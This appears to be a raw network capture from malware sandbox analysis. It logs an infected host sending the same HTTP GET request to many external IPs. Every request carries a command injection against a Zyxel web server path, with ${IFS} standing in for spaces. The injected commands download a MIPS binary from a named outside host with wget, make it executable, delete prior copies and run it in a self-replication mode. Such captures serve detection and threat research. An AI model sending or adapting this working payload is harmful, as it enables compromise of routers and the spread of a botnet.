                                                Jan 29, 2024 07:07:43.212430000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3024192.168.2.2340710202.24.147.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212460995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3025192.168.2.234157870.64.182.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212502003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3026192.168.2.234006613.64.206.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212543011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3027192.168.2.233645069.55.145.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212599993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3028192.168.2.2336252138.186.111.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212631941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3029192.168.2.2340006131.39.45.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212658882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3030192.168.2.2354356187.156.111.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212709904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3031192.168.2.2346032124.188.111.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212757111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3032192.168.2.2348240166.218.55.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212784052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3033192.168.2.2334976133.186.64.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212836981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3034192.168.2.2348884196.34.61.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212872982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3035192.168.2.233705466.4.131.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212905884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3036192.168.2.2353644166.235.5.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212944031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3037192.168.2.234340290.91.43.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212980986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3038192.168.2.2350480116.110.134.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213017941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3039192.168.2.2358836221.30.66.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213080883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3040192.168.2.235752274.170.152.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213112116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3041192.168.2.235687878.22.243.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213160038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3042192.168.2.233400654.239.117.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213197947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3043192.168.2.2357600141.140.224.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213223934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3044192.168.2.2337444166.78.117.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213273048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3045192.168.2.233564245.83.37.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213308096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3046192.168.2.234713849.151.161.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213332891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3047192.168.2.2340044167.47.207.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213382006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3048192.168.2.2358842204.153.52.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213409901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3049192.168.2.2353962140.153.164.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213466883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3050192.168.2.234272035.155.118.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213509083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3051192.168.2.235177270.22.229.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213542938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3052192.168.2.2344744186.31.115.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213579893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3053192.168.2.233448220.25.185.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213628054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3054192.168.2.2358258111.183.151.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213644028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3055192.168.2.2345014122.209.29.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213690996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3056192.168.2.236079853.77.251.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213715076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3057192.168.2.235298882.250.83.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213732958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3058192.168.2.2343426141.72.128.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213785887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3059192.168.2.2358330111.45.130.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213821888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3060192.168.2.2337576118.148.210.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213881016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3061192.168.2.2355938181.53.22.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213913918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3062192.168.2.2354818108.73.198.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213948965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3063192.168.2.234956854.46.147.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.213963032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3064192.168.2.235376041.197.13.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214003086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3065192.168.2.2345050167.225.2.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214031935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3066192.168.2.233531257.170.20.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214096069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3067192.168.2.234791861.141.220.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214121103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3068192.168.2.2343534160.154.121.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214154959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3069192.168.2.2359958171.177.141.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214195967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3070192.168.2.2344736146.83.64.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214231014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3071192.168.2.2338566204.202.39.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214246988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3072192.168.2.235839614.239.64.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214323997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3073192.168.2.2335052222.83.93.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214354038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3074192.168.2.235913059.169.242.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214399099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3075192.168.2.2336494170.227.47.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214442968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3076192.168.2.2337076219.124.11.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214483023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3077192.168.2.2359532216.157.42.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214518070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3078192.168.2.235345275.35.226.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214570045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3079192.168.2.23496384.176.32.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214592934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3080192.168.2.2344822153.217.213.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214605093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3081192.168.2.234609250.249.250.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214674950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3082192.168.2.2346324155.106.187.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214713097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3083192.168.2.2356228150.171.54.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214751959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3084192.168.2.23540948.97.136.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214787006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3085192.168.2.2352902168.204.17.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214812994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3086192.168.2.234360296.151.143.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214840889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3087192.168.2.234381862.81.215.28443
                                                TimestampBytes transferredDirectionData
